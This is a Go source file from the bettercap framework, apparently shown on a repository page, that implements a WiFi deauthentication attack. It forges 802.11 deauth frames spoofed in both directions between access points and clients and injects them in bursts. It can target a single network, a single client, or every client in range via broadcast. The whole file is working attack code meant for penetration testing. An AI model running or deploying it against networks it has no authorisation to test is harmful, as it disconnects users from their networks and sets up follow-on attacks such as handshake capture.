bettercap/modules/wifi_deauth.go
2018-08-02 17:26:51 +02:00

80 lines
1.9 KiB
Go

package modules
import (
"bytes"
"fmt"
"net"
"time"
"github.com/bettercap/bettercap/log"
"github.com/bettercap/bettercap/network"
"github.com/bettercap/bettercap/packets"
)
func (w *WiFiModule) injectPacket(data []byte) {
if err := w.handle.WritePacketData(data); err != nil {
log.Error("Could not inject WiFi packet: %s", err)
w.Session.Queue.TrackError()
} else {
w.Session.Queue.TrackSent(uint64(len(data)))
}
// let the network card breath a little
time.Sleep(10 * time.Millisecond)
}
func (w *WiFiModule) sendDeauthPacket(ap net.HardwareAddr, client net.HardwareAddr) {
for seq := uint16(0); seq < 64 && w.Running(); seq++ {
if err, pkt := packets.NewDot11Deauth(ap, client, ap, seq); err != nil {
log.Error("Could not create deauth packet: %s", err)
continue
} else {
w.injectPacket(pkt)
}
if err, pkt := packets.NewDot11Deauth(client, ap, ap, seq); err != nil {
log.Error("Could not create deauth packet: %s", err)
continue
} else {
w.injectPacket(pkt)
}
}
}
func (w *WiFiModule) startDeauth(to net.HardwareAddr) error {
// if not already running, temporarily enable the pcap handle
// for packet injection
if !w.Running() {
if err := w.Configure(); err != nil {
return err
}
defer w.handle.Close()
}
w.writes.Add(1)
defer w.writes.Done()
isBcast := network.IsBroadcastMac(to)
found := isBcast
for _, ap := range w.Session.WiFi.List() {
for _, client := range ap.Clients() {
doDeauth := isBcast ||
bytes.Equal(ap.HW, to) ||
bytes.Equal(client.HW, to)
if doDeauth {
found = true
if w.Running() {
log.Info("Deauthing client %s from AP %s ...", client.String(), ap.ESSID())
w.onChannel(network.Dot11Freq2Chan(ap.Frequency), func() {
w.sendDeauthPacket(ap.HW, client.HW)
})
}
}
}
}
if found {
return nil
}
return fmt.Errorf("%s is an unknown BSSID.", to.String())
}